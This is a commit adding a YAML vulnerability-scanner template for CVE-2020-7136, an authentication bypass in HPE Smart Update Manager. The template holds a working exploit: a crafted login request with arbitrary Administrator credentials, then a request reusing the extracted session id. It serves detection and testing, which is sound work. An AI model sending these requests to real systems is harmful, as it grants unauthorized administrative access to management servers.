Merge pull request #3519 from gy741/rule-add-v86

Create CVE-2020-7136.yaml
2022-01-11 13:45:22 +05:30 · 2022-01-11 13:45:22 +05:30 · e5407e9263
parent 42432335f0 6ea0a7f492
commit e5407e9263
1 changed files with 49 additions and 0 deletions
--- a/cves/2020/CVE-2020-7136.yaml
+++ b/cves/2020/CVE-2020-7136.yaml
@ -0,0 +1,49 @@
+id: CVE-2020-7136
+
+info:
+  name: HPE Smart Update Manager - Remote Unauthorized Access
+  author: gy741
+  severity: critical
+  description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
+  reference:
+    - https://www.tenable.com/security/research/tra-2020-02
+    - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7136
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-7136
+    cwe-id: CWE-288
+  tags: cve,cve2020,hp,auth-bypass,hpe
+
+requests:
+  - raw:
+      - |
+        POST /session/create HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/json
+
+        {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
+
+      - |
+        GET /session/{{sessionid}}/node/index HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "hmessage"
+          - "Command completed successfully."
+          - "node_name"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: sessionid
+        group: 1
+        internal: true
+        part: body
+        regex:
+          - '"sessionId":"([a-z0-9.]+)"'